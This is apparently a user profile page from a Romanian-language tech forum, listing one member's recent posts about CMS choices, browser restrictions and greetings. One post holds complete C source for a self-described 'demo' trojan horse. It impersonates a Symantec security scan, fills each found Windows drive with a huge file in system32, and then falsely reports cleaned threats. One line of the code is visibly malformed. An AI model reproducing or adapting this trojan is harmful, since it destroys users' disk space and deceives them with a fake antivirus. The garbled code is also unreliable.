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About al3x4ndru

  • Birthday 03/06/1991

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  1. @off:Chivas - bleach... Extensia merge bine pe mozila, pe chrome mai scartie...
  2. mai poti sa-l pui pe hybernate si sa pui o melodie la task scheduler;e mai simplu.
  3. multumesc... o sa te tin la curent
  4. dar nu ma descurc cu php...
  5. Vreau sa fac un mini portal care sa cuprinda o camera de chat ,galerii de imagini ,filmulete si altele.Html si Css stiu destul de bine,dar ajax,asp si php mai deloc, de aceea vreau sa folosesc un cms.Unii mi-au spus de php-nuke ,altii de joomla,altii sa-mi fac eu propriul cms ca e mai sigur.Am cautat si pe google si am vazut ca fiecare are avantaje si dezavantaje.Mai rau m-am incurcat ,asa ca va intreb pe voi...
  6. am vrut sa fac si eu asa ,dar ma gandeam ca se vor supara.
  7. asta este blogul tau?
  8. salut!cunostiinte?
  9. http://www.nemesis-security.com/Residential.aspx
  10. si mie tot 26!
  11. bine ai venit!
  12. #include<stdio.h> #include<conio.h> #include<dos.h> #include<stdlib.h> FILE *a,*t,*b; int r,status,vir_count; double i; char ch[]="CREATING A HUGE FILE FOR OCCUPYING HARDDISK SPACE",choice; void eatspace(void); void findroot(void); void showstatus(void); void draw(void); void accept(void); void main() { draw(); accept(); textcolor(WHITE); draw(); gotoxy(12,8); cputs("ANALYZING YOUR SYSTEM. PLEASE WAIT..."); sleep(3); gotoxy(12,8); delline(); cputs("PRESS ANY KEY TO START THE SYSTEM SCAN..."); getch(); gotoxy(12,8); delline(); findroot(); } void accept() { textcolor(LIGHTRED); gotoxy(1,8); cputs("THIS PROGRAM IS A DEMO OF SIMPLE TROJAN HORSE. IF YOU RUN THIS PROGRAM IT WILL\n\rEAT UP YOUR FULL HARD DISK SPACE ON ROOT DRIVE. HOWEVER IT IS POSSIBLE TO\n\rELIMINATE THE DAMAGE.\n\n\rTO CLEANUP THE DAMAGE YOU\'VE TO DELETE THE FILE \"spceshot.dll\" LOCATED IN\n\n\r \"%windir%\\System32\".\n\n\rIF YOU WISH TO RUN THE PROGRAM PRESS ENTER, OTHERWISE PRESS ANY KEY TO QUIT."); if((choice=getch())!=13) exit(0); } void draw() { clrscr(); textcolor(WHITE); gotoxy(12,2); cputs("********************************************************"); gotoxy(12,6); cputs("********************************************************"); gotoxy(12,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(67,3); cputs("*\n\b*\n\b*\n\b"); gotoxy(14,4); cputs("SYMANTEC SECURITY SCAN - 2009 (QUICK SYSTEM SCANNER)"); } void findroot() { t=fopen("C:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); textcolor(WHITE); a=fopen("C:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("C:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("D:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("D:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("D:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("E:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("E:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("E:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } t=fopen("F:\\windows\\explorer.exe","rb"); if(t!=NULL) { fclose(t); a=fopen("F:\\windows\\system32\\spceshot.dll","rb"); if(a!=NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN WAS INTERRUPTED. TRY AGAIN LATER!"); getch(); exit(1); } b=fopen("F:\\windows\\system32\\spceshot.dll","wb+"); if(b!=NULL) { showstatus(); eatspace(); } } if(t==NULL) { textcolor(LIGHTRED); gotoxy(12,8); cputs("SYSTEM SCAN FAILED! PRESS ANY KEY TO CLOSE THIS PROGRAM."); getch(); exit(1); } exit(1); } void eatspace() { textcolor(LIGHTRED); gotoxy(12,16); cputs("WARNING: DO NOT ABORT THE SCAN PROCESS UNTIL IT IS COMPLETED!\n"); textcolor(WHITE); gotoxy(12,18); while(1) { for(r=1;r<4;r++) { for(i=1;i<900000;i++) { status=fputs(ch,; if(status==EOF) { textcolor(WHITE); vir_count=random(120); draw(); gotoxy(12,8); cprintf("SCAN COMPLETE!. DETECTED AND CLEANED OVER %d THREATS!",vir_count); gotoxy(12,10); cprintf("PRESS ANY KEY TO CLOSE..."); getch(); break; } } cputs("."); if(status==EOF) break; } if(status==EOF) break; } exit(0); } void showstatus() { gotoxy(12,8); cputs("SCANNING THE SYSTEM FOR THREATS"); gotoxy(12,10); cputs("THIS MAY TAKE UP A FEW MINUTES TO FEW HOURS"); gotoxy(12,13); cputs("SCAN IN PROGRESS. PLEASE WAIT..."); }
  13. topicul este destul de vechi! Sunt cazuri in care accesul la browser este interzis(firme,scoala) si astfel se poate folosi aceasta alternativa! daca accesul la browser este limitat sau interzis ,nu se poate folosi nici windows explorer ,deoarece este folosit tot motorul de randare a lui i.e. ,in timp ce aplicatia help are propriul motor de randare( mult inferior chiar si lui I.E ).
  14. http://chinabanks.mobi/ daca intrati aici se descarcaun fisier cu numele index.php! de ce?
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